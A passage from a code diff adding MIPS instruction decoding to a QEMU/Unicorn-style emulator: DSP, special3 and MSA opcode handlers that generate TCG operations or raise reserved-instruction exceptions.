OPC_CMP_LT_PH: + case OPC_CMP_LE_PH: + gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 0); + break; + case OPC_CMPGU_EQ_QB: + case OPC_CMPGU_LT_QB: + case OPC_CMPGU_LE_QB: + case OPC_CMPGDU_EQ_QB: + case OPC_CMPGDU_LT_QB: + case OPC_CMPGDU_LE_QB: + case OPC_PICK_QB: + case OPC_PICK_PH: + case OPC_PACKRL_PH: + gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 1); + break; + default: /* Invalid */ + MIPS_INVAL("MASK CMPU.EQ.QB"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_SHLL_QB_DSP: + gen_mipsdsp_shift(ctx, op1, rd, rs, rt); + break; + case OPC_DPA_W_PH_DSP: + op2 = MASK_DPA_W_PH(ctx->opcode); + switch (op2) { + case OPC_DPAU_H_QBL: + case OPC_DPAU_H_QBR: + case OPC_DPSU_H_QBL: + case OPC_DPSU_H_QBR: + case OPC_DPA_W_PH: + case OPC_DPAX_W_PH: + case OPC_DPAQ_S_W_PH: + case OPC_DPAQX_S_W_PH: + case OPC_DPAQX_SA_W_PH: + case OPC_DPS_W_PH: + case OPC_DPSX_W_PH: + case OPC_DPSQ_S_W_PH: + case OPC_DPSQX_S_W_PH: + case OPC_DPSQX_SA_W_PH: + case OPC_MULSAQ_S_W_PH: + case OPC_DPAQ_SA_L_W: + case OPC_DPSQ_SA_L_W: + case OPC_MAQ_S_W_PHL: + case OPC_MAQ_S_W_PHR: + case OPC_MAQ_SA_W_PHL: + case OPC_MAQ_SA_W_PHR: + case OPC_MULSA_W_PH: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); + break; + default: /* Invalid */ + MIPS_INVAL("MASK DPAW.PH"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_INSV_DSP: + op2 = MASK_INSV(ctx->opcode); + switch (op2) { + case OPC_INSV: + check_dsp(ctx); + { + TCGv t0, t1; + + if (rt == 0) { + MIPS_DEBUG("NOP"); + break; + } + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_load_gpr(ctx, t1, rs); + + gen_helper_insv(tcg_ctx, *cpu_gpr[rt], tcg_ctx->cpu_env, t1, t0); + + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + break; + } + default: /* Invalid */ + MIPS_INVAL("MASK INSV"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_APPEND_DSP: + gen_mipsdsp_append(env, ctx, op1, rt, rs, rd); + break; + case OPC_EXTR_W_DSP: + op2 = MASK_EXTR_W(ctx->opcode); + switch (op2) { + case OPC_EXTR_W: + case OPC_EXTR_R_W: + case OPC_EXTR_RS_W: + case OPC_EXTR_S_H: + case OPC_EXTRV_S_H: + case OPC_EXTRV_W: + case OPC_EXTRV_R_W: + case OPC_EXTRV_RS_W: + case OPC_EXTP: + case OPC_EXTPV: + case OPC_EXTPDP: + case OPC_EXTPDPV: + gen_mipsdsp_accinsn(ctx, op1, op2, rt, rs, rd, 1); + break; + case OPC_RDDSP: + gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 1); + break; + case OPC_SHILO: + case OPC_SHILOV: + case OPC_MTHLIP: + case OPC_WRDSP: + gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 0); + break; + default: /* Invalid */ + MIPS_INVAL("MASK EXTR.W"); + generate_exception(ctx, EXCP_RI); + break; + } + break; +#if defined(TARGET_MIPS64) + case OPC_DDIV_G_2E: case OPC_DDIVU_G_2E: + case OPC_DMULT_G_2E: case OPC_DMULTU_G_2E: + case OPC_DMOD_G_2E: case OPC_DMODU_G_2E: + check_insn(ctx, INSN_LOONGSON2E); + gen_loongson_integer(ctx, op1, rd, rs, rt); + break; + case OPC_ABSQ_S_QH_DSP: + op2 = MASK_ABSQ_S_QH(ctx->opcode); + switch (op2) { + case OPC_PRECEQ_L_PWL: + case OPC_PRECEQ_L_PWR: + case OPC_PRECEQ_PW_QHL: + case OPC_PRECEQ_PW_QHR: + case OPC_PRECEQ_PW_QHLA: + case OPC_PRECEQ_PW_QHRA: + case OPC_PRECEQU_QH_OBL: + case OPC_PRECEQU_QH_OBR: + case OPC_PRECEQU_QH_OBLA: + case OPC_PRECEQU_QH_OBRA: + case OPC_PRECEU_QH_OBL: + case OPC_PRECEU_QH_OBR: + case OPC_PRECEU_QH_OBLA: + case OPC_PRECEU_QH_OBRA: + case OPC_ABSQ_S_OB: + case OPC_ABSQ_S_PW: + case OPC_ABSQ_S_QH: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_REPL_OB: + case OPC_REPL_PW: + case OPC_REPL_QH: + case OPC_REPLV_OB: + case OPC_REPLV_PW: + case OPC_REPLV_QH: + gen_mipsdsp_bitinsn(ctx, op1, op2, rd, rt); + break; + default: /* Invalid */ + MIPS_INVAL("MASK ABSQ_S.QH"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_ADDU_OB_DSP: + op2 = MASK_ADDU_OB(ctx->opcode); + switch (op2) { + case OPC_RADDU_L_OB: + case OPC_SUBQ_PW: + case OPC_SUBQ_S_PW: + case OPC_SUBQ_QH: + case OPC_SUBQ_S_QH: + case OPC_SUBU_OB: + case OPC_SUBU_S_OB: + case OPC_SUBU_QH: + case OPC_SUBU_S_QH: + case OPC_SUBUH_OB: + case OPC_SUBUH_R_OB: + case OPC_ADDQ_PW: + case OPC_ADDQ_S_PW: + case OPC_ADDQ_QH: + case OPC_ADDQ_S_QH: + case OPC_ADDU_OB: + case OPC_ADDU_S_OB: + case OPC_ADDU_QH: + case OPC_ADDU_S_QH: + case OPC_ADDUH_OB: + case OPC_ADDUH_R_OB: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_MULEQ_S_PW_QHL: + case OPC_MULEQ_S_PW_QHR: + case OPC_MULEU_S_QH_OBL: + case OPC_MULEU_S_QH_OBR: + case OPC_MULQ_RS_QH: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 1); + break; + default: /* Invalid */ + MIPS_INVAL("MASK ADDU.OB"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_CMPU_EQ_OB_DSP: + op2 = MASK_CMPU_EQ_OB(ctx->opcode); + switch (op2) { + case OPC_PRECR_SRA_QH_PW: + case OPC_PRECR_SRA_R_QH_PW: + /* Return value is rt. */ + gen_mipsdsp_arith(ctx, op1, op2, rt, rs, rd); + break; + case OPC_PRECR_OB_QH: + case OPC_PRECRQ_OB_QH: + case OPC_PRECRQ_PW_L: + case OPC_PRECRQ_QH_PW: + case OPC_PRECRQ_RS_QH_PW: + case OPC_PRECRQU_S_OB_QH: + gen_mipsdsp_arith(ctx, op1, op2, rd, rs, rt); + break; + case OPC_CMPU_EQ_OB: + case OPC_CMPU_LT_OB: + case OPC_CMPU_LE_OB: + case OPC_CMP_EQ_QH: + case OPC_CMP_LT_QH: + case OPC_CMP_LE_QH: + case OPC_CMP_EQ_PW: + case OPC_CMP_LT_PW: + case OPC_CMP_LE_PW: + gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 0); + break; + case OPC_CMPGDU_EQ_OB: + case OPC_CMPGDU_LT_OB: + case OPC_CMPGDU_LE_OB: + case OPC_CMPGU_EQ_OB: + case OPC_CMPGU_LT_OB: + case OPC_CMPGU_LE_OB: + case OPC_PACKRL_PW: + case OPC_PICK_OB: + case OPC_PICK_PW: + case OPC_PICK_QH: + gen_mipsdsp_add_cmp_pick(ctx, op1, op2, rd, rs, rt, 1); + break; + default: /* Invalid */ + MIPS_INVAL("MASK CMPU_EQ.OB"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DAPPEND_DSP: + gen_mipsdsp_append(env, ctx, op1, rt, rs, rd); + break; + case OPC_DEXTR_W_DSP: + op2 = MASK_DEXTR_W(ctx->opcode); + switch (op2) { + case OPC_DEXTP: + case OPC_DEXTPDP: + case OPC_DEXTPDPV: + case OPC_DEXTPV: + case OPC_DEXTR_L: + case OPC_DEXTR_R_L: + case OPC_DEXTR_RS_L: + case OPC_DEXTR_W: + case OPC_DEXTR_R_W: + case OPC_DEXTR_RS_W: + case OPC_DEXTR_S_H: + case OPC_DEXTRV_L: + case OPC_DEXTRV_R_L: + case OPC_DEXTRV_RS_L: + case OPC_DEXTRV_S_H: + case OPC_DEXTRV_W: + case OPC_DEXTRV_R_W: + case OPC_DEXTRV_RS_W: + gen_mipsdsp_accinsn(ctx, op1, op2, rt, rs, rd, 1); + break; + case OPC_DMTHLIP: + case OPC_DSHILO: + case OPC_DSHILOV: + gen_mipsdsp_accinsn(ctx, op1, op2, rd, rs, rt, 0); + break; + default: /* Invalid */ + MIPS_INVAL("MASK EXTR.W"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DPAQ_W_QH_DSP: + op2 = MASK_DPAQ_W_QH(ctx->opcode); + switch (op2) { + case OPC_DPAU_H_OBL: + case OPC_DPAU_H_OBR: + case OPC_DPSU_H_OBL: + case OPC_DPSU_H_OBR: + case OPC_DPA_W_QH: + case OPC_DPAQ_S_W_QH: + case OPC_DPS_W_QH: + case OPC_DPSQ_S_W_QH: + case OPC_MULSAQ_S_W_QH: + case OPC_DPAQ_SA_L_PW: + case OPC_DPSQ_SA_L_PW: + case OPC_MULSAQ_S_L_PW: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); + break; + case OPC_MAQ_S_W_QHLL: + case OPC_MAQ_S_W_QHLR: + case OPC_MAQ_S_W_QHRL: + case OPC_MAQ_S_W_QHRR: + case OPC_MAQ_SA_W_QHLL: + case OPC_MAQ_SA_W_QHLR: + case OPC_MAQ_SA_W_QHRL: + case OPC_MAQ_SA_W_QHRR: + case OPC_MAQ_S_L_PWL: + case OPC_MAQ_S_L_PWR: + case OPC_DMADD: + case OPC_DMADDU: + case OPC_DMSUB: + case OPC_DMSUBU: + gen_mipsdsp_multiply(ctx, op1, op2, rd, rs, rt, 0); + break; + default: /* Invalid */ + MIPS_INVAL("MASK DPAQ.W.QH"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_DINSV_DSP: + op2 = MASK_INSV(ctx->opcode); + switch (op2) { + case OPC_DINSV: + { + TCGv t0, t1; + + if (rt == 0) { + MIPS_DEBUG("NOP"); + break; + } + check_dsp(ctx); + + t0 = tcg_temp_new(tcg_ctx); + t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_load_gpr(ctx, t1, rs); + + gen_helper_dinsv(tcg_ctx, *cpu_gpr[rt], tcg_ctx->cpu_env, t1, t0); + + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + break; + } + default: /* Invalid */ + MIPS_INVAL("MASK DINSV"); + generate_exception(ctx, EXCP_RI); + break; + } + break; + case OPC_SHLL_OB_DSP: + gen_mipsdsp_shift(ctx, op1, rd, rs, rt); + break; +#endif + default: /* Invalid */ + MIPS_INVAL("special3_legacy"); + generate_exception(ctx, EXCP_RI); + break; + } +} + +static void decode_opc_special3(CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + int rs, rt, rd, sa; + uint32_t op1, op2; + + rs = (ctx->opcode >> 21) & 0x1f; + rt = (ctx->opcode >> 16) & 0x1f; + rd = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 6) & 0x1f; + + op1 = MASK_SPECIAL3(ctx->opcode); + switch (op1) { + case OPC_EXT: + case OPC_INS: + check_insn(ctx, ISA_MIPS32R2); + gen_bitops(ctx, op1, rt, rs, sa, rd); + break; + case OPC_BSHFL: + op2 = MASK_BSHFL(ctx->opcode); + switch (op2) { + case OPC_ALIGN: case OPC_ALIGN_END: + case OPC_BITSWAP: + check_insn(ctx, ISA_MIPS32R6); + decode_opc_special3_r6(env, ctx); + break; + default: + check_insn(ctx, ISA_MIPS32R2); + gen_bshfl(ctx, op2, rt, rd); + break; + } + break; +#if defined(TARGET_MIPS64) + case OPC_DEXTM: case OPC_DEXTU: case OPC_DEXT: + case OPC_DINSM: case OPC_DINSU: case OPC_DINS: + check_insn(ctx, ISA_MIPS64R2); + check_mips_64(ctx); + gen_bitops(ctx, op1, rt, rs, sa, rd); + break; + case OPC_DBSHFL: + op2 = MASK_DBSHFL(ctx->opcode); + switch (op2) { + case OPC_DALIGN: case OPC_DALIGN_END: + case OPC_DBITSWAP: + check_insn(ctx, ISA_MIPS32R6); + decode_opc_special3_r6(env, ctx); + break; + default: + check_insn(ctx, ISA_MIPS64R2); + check_mips_64(ctx); + op2 = MASK_DBSHFL(ctx->opcode); + gen_bshfl(ctx, op2, rt, rd); + break; + } + break; +#endif + case OPC_RDHWR: + gen_rdhwr(ctx, rt, rd); + break; + case OPC_FORK: + check_insn(ctx, ASE_MT); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + gen_load_gpr(ctx, t0, rt); + gen_load_gpr(ctx, t1, rs); + gen_helper_fork(tcg_ctx, t0, t1); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); + } + break; + case OPC_YIELD: + check_insn(ctx, ASE_MT); + { + TCGv t0 = tcg_temp_new(tcg_ctx); + + save_cpu_state(ctx, 1); + gen_load_gpr(ctx, t0, rs); + gen_helper_yield(tcg_ctx, t0, tcg_ctx->cpu_env, t0); + gen_store_gpr(tcg_ctx, t0, rd); + tcg_temp_free(tcg_ctx, t0); + } + break; + default: + if (ctx->insn_flags & ISA_MIPS32R6) { + decode_opc_special3_r6(env, ctx); + } else { + decode_opc_special3_legacy(env, ctx); + } + } +} + +/* MIPS SIMD Architecture (MSA) */ +static inline int check_msa_access(DisasContext *ctx) +{ + if (unlikely((ctx->hflags & MIPS_HFLAG_FPU) && + !(ctx->hflags & MIPS_HFLAG_F64))) { + generate_exception(ctx, EXCP_RI); + return 0; + } + + if (unlikely(!(ctx->hflags & MIPS_HFLAG_MSA))) { + if (ctx->insn_flags & ASE_MSA) { + generate_exception(ctx, EXCP_MSADIS); + return 0; + } else { + generate_exception(ctx, EXCP_RI); + return 0; + } + } + return 1; +} + +static void gen_check_zero_element(CPUMIPSState *env, TCGv tresult, uint8_t df, uint8_t wt) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + /* generates tcg ops to check if any element is 0 */ + /* Note this function only works with MSA_WRLEN = 128 */ + uint64_t eval_zero_or_big = 0; + uint64_t eval_big = 0; + TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); + switch (df) { + case DF_BYTE: + eval_zero_or_big = 0x0101010101010101ULL; + eval_big = 0x8080808080808080ULL; + break; + case DF_HALF: + eval_zero_or_big = 0x0001000100010001ULL; + eval_big = 0x8000800080008000ULL; + break; + case DF_WORD: + eval_zero_or_big = 0x0000000100000001ULL; + eval_big = 0x8000000080000000ULL; + break; + case DF_DOUBLE: + eval_zero_or_big = 0x0000000000000001ULL; + eval_big = 0x8000000000000000ULL; + break; + } + tcg_gen_subi_i64(tcg_ctx, t0, tcg_ctx->msa_wr_d[wt<<1], eval_zero_or_big); + tcg_gen_andc_i64(tcg_ctx, t0, t0, tcg_ctx->msa_wr_d[wt<<1]); + tcg_gen_andi_i64(tcg_ctx, t0, t0, eval_big); + tcg_gen_subi_i64(tcg_ctx, t1, tcg_ctx->msa_wr_d[(wt<<1)+1], eval_zero_or_big); + tcg_gen_andc_i64(tcg_ctx, t1, t1, tcg_ctx->msa_wr_d[(wt<<1)+1]); + tcg_gen_andi_i64(tcg_ctx, t1, t1, eval_big); + tcg_gen_or_i64(tcg_ctx, t0, t0, t1); + /* if all bits are zero then all elements are not zero */ + /* if some bit is non-zero then some element is zero */ + tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_NE, t0, t0, 0); + tcg_gen_trunc_i64_tl(tcg_ctx, tresult, t0); + tcg_temp_free_i64(tcg_ctx, t0); + tcg_temp_free_i64(tcg_ctx, t1); +} + +static void gen_msa_branch(CPUMIPSState *env, DisasContext *ctx, uint32_t op1) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; + uint8_t df = (ctx->opcode >> 21) & 0x3; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + int64_t s16 = (int16_t)ctx->opcode; + + check_msa_access(ctx); + + if (ctx->insn_flags & ISA_MIPS32R6 && ctx->hflags & MIPS_HFLAG_BMASK) { + MIPS_DEBUG("CTI in delay / forbidden slot"); + generate_exception(ctx, EXCP_RI); + return; + } + switch (op1) { + case OPC_BZ_V: + case OPC_BNZ_V: + { + TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_or_i64(tcg_ctx, t0, tcg_ctx->msa_wr_d[wt<<1], tcg_ctx->msa_wr_d[(wt<<1)+1]); + tcg_gen_setcondi_i64(tcg_ctx, (op1 == OPC_BZ_V) ? + TCG_COND_EQ : TCG_COND_NE, t0, t0, 0); + tcg_gen_trunc_i64_tl(tcg_ctx, *(TCGv *)tcg_ctx->bcond, t0); + tcg_temp_free_i64(tcg_ctx, t0); + } + break; + case OPC_BZ_B: + case OPC_BZ_H: + case OPC_BZ_W: + case OPC_BZ_D: + gen_check_zero_element(env, *(TCGv *)tcg_ctx->bcond, df, wt); + break; + case OPC_BNZ_B: + case OPC_BNZ_H: + case OPC_BNZ_W: + case OPC_BNZ_D: + gen_check_zero_element(env, *(TCGv *)tcg_ctx->bcond, df, wt); + tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, *(TCGv *)tcg_ctx->bcond, *(TCGv *)tcg_ctx->bcond, 0); + break; + } + + ctx->btarget = ctx->pc + (int64_t)((uint64_t)s16 << 2) + 4; + + ctx->hflags |= MIPS_HFLAG_BC; + ctx->hflags |= MIPS_HFLAG_BDS32; +} + +static void gen_msa_i8(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_I8(op) (MASK_MSA_MINOR(op) | (op & (0x03 << 24))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t i8 = (ctx->opcode >> 16) & 0xff; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 ti8 = tcg_const_i32(tcg_ctx, i8); + + switch (MASK_MSA_I8(ctx->opcode)) { + case OPC_ANDI_B: + gen_helper_msa_andi_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_ORI_B: + gen_helper_msa_ori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_NORI_B: + gen_helper_msa_nori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_XORI_B: + gen_helper_msa_xori_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_BMNZI_B: + gen_helper_msa_bmnzi_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_BMZI_B: + gen_helper_msa_bmzi_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_BSELI_B: + gen_helper_msa_bseli_b(tcg_ctx, tcg_ctx->cpu_env, twd, tws, ti8); + break; + case OPC_SHF_B: + case OPC_SHF_H: + case OPC_SHF_W: + { + uint8_t df = (ctx->opcode >> 24) & 0x3; + if (df == DF_DOUBLE) { + generate_exception(ctx, EXCP_RI); + } else { + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + gen_helper_msa_shf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, ti8); + tcg_temp_free_i32(tcg_ctx, tdf); + } + } + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, ti8); +} + +static void gen_msa_i5(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_I5(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t df = (ctx->opcode >> 21) & 0x3; + int8_t s5 = (int8_t) sextract32(ctx->opcode, 16, 5); + uint8_t u5 = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 timm = tcg_temp_new_i32(tcg_ctx); + tcg_gen_movi_i32(tcg_ctx, timm, u5); + + switch (MASK_MSA_I5(ctx->opcode)) { + case OPC_ADDVI_df: + gen_helper_msa_addvi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_SUBVI_df: + gen_helper_msa_subvi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_MAXI_S_df: + tcg_gen_movi_i32(tcg_ctx, timm, s5); + gen_helper_msa_maxi_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_MAXI_U_df: + gen_helper_msa_maxi_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_MINI_S_df: + tcg_gen_movi_i32(tcg_ctx, timm, s5); + gen_helper_msa_mini_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_MINI_U_df: + gen_helper_msa_mini_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_CEQI_df: + tcg_gen_movi_i32(tcg_ctx, timm, s5); + gen_helper_msa_ceqi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_CLTI_S_df: + tcg_gen_movi_i32(tcg_ctx, timm, s5); + gen_helper_msa_clti_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_CLTI_U_df: + gen_helper_msa_clti_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_CLEI_S_df: + tcg_gen_movi_i32(tcg_ctx, timm, s5); + gen_helper_msa_clei_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_CLEI_U_df: + gen_helper_msa_clei_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, timm); + break; + case OPC_LDI_df: + { + int32_t s10 = sextract32(ctx->opcode, 11, 10); + tcg_gen_movi_i32(tcg_ctx, timm, s10); + gen_helper_msa_ldi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, timm); + } + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, tdf); + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); + tcg_temp_free_i32(tcg_ctx, timm); +} + +static void gen_msa_bit(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_BIT(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t dfm = (ctx->opcode >> 16) & 0x7f; + uint32_t df = 0, m = 0; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + + TCGv_i32 tdf; + TCGv_i32 tm; + TCGv_i32 twd; + TCGv_i32 tws; + + if ((dfm & 0x40) == 0x00) { + m = dfm & 0x3f; + df = DF_DOUBLE; + } else if ((dfm & 0x60) == 0x40) { + m = dfm & 0x1f; + df = DF_WORD; + } else if ((dfm & 0x70) == 0x60) { + m = dfm & 0x0f; + df = DF_HALF; + } else if ((dfm & 0x78) == 0x70) { + m = dfm & 0x7; + df = DF_BYTE; + } else { + generate_exception(ctx, EXCP_RI); + return; + } + + tdf = tcg_const_i32(tcg_ctx, df); + tm = tcg_const_i32(tcg_ctx, m); + twd = tcg_const_i32(tcg_ctx, wd); + tws = tcg_const_i32(tcg_ctx, ws); + + switch (MASK_MSA_BIT(ctx->opcode)) { + case OPC_SLLI_df: + gen_helper_msa_slli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SRAI_df: + gen_helper_msa_srai_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SRLI_df: + gen_helper_msa_srli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_BCLRI_df: + gen_helper_msa_bclri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_BSETI_df: + gen_helper_msa_bseti_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_BNEGI_df: + gen_helper_msa_bnegi_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_BINSLI_df: + gen_helper_msa_binsli_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_BINSRI_df: + gen_helper_msa_binsri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SAT_S_df: + gen_helper_msa_sat_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SAT_U_df: + gen_helper_msa_sat_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SRARI_df: + gen_helper_msa_srari_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + case OPC_SRLRI_df: + gen_helper_msa_srlri_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, tm); + break; + default: + MIPS_INVAL("MSA instruction"); + generate_exception(ctx, EXCP_RI); + break; + } + + tcg_temp_free_i32(tcg_ctx, tdf); + tcg_temp_free_i32(tcg_ctx, tm); + tcg_temp_free_i32(tcg_ctx, twd); + tcg_temp_free_i32(tcg_ctx, tws); +} + +static void gen_msa_3r(CPUMIPSState *env, DisasContext *ctx) +{ +#define MASK_MSA_3R(op) (MASK_MSA_MINOR(op) | (op & (0x7 << 23))) + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + uint8_t df = (ctx->opcode >> 21) & 0x3; + uint8_t wt = (ctx->opcode >> 16) & 0x1f; + uint8_t ws = (ctx->opcode >> 11) & 0x1f; + uint8_t wd = (ctx->opcode >> 6) & 0x1f; + + TCGv_i32 tdf = tcg_const_i32(tcg_ctx, df); + TCGv_i32 twd = tcg_const_i32(tcg_ctx, wd); + TCGv_i32 tws = tcg_const_i32(tcg_ctx, ws); + TCGv_i32 twt = tcg_const_i32(tcg_ctx, wt); + + switch (MASK_MSA_3R(ctx->opcode)) { + case OPC_SLL_df: + gen_helper_msa_sll_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ADDV_df: + gen_helper_msa_addv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_CEQ_df: + gen_helper_msa_ceq_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ADD_A_df: + gen_helper_msa_add_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SUBS_S_df: + gen_helper_msa_subs_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MULV_df: + gen_helper_msa_mulv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SLD_df: + gen_helper_msa_sld_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_VSHF_df: + gen_helper_msa_vshf_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SRA_df: + gen_helper_msa_sra_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SUBV_df: + gen_helper_msa_subv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ADDS_A_df: + gen_helper_msa_adds_a_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SUBS_U_df: + gen_helper_msa_subs_u_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MADDV_df: + gen_helper_msa_maddv_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SPLAT_df: + gen_helper_msa_splat_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SRAR_df: + gen_helper_msa_srar_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_SRL_df: + gen_helper_msa_srl_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_MAX_S_df: + gen_helper_msa_max_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_CLT_S_df: + gen_helper_msa_clt_s_df(tcg_ctx, tcg_ctx->cpu_env, tdf, twd, tws, twt); + break; + case OPC_ADDS_S_df: + 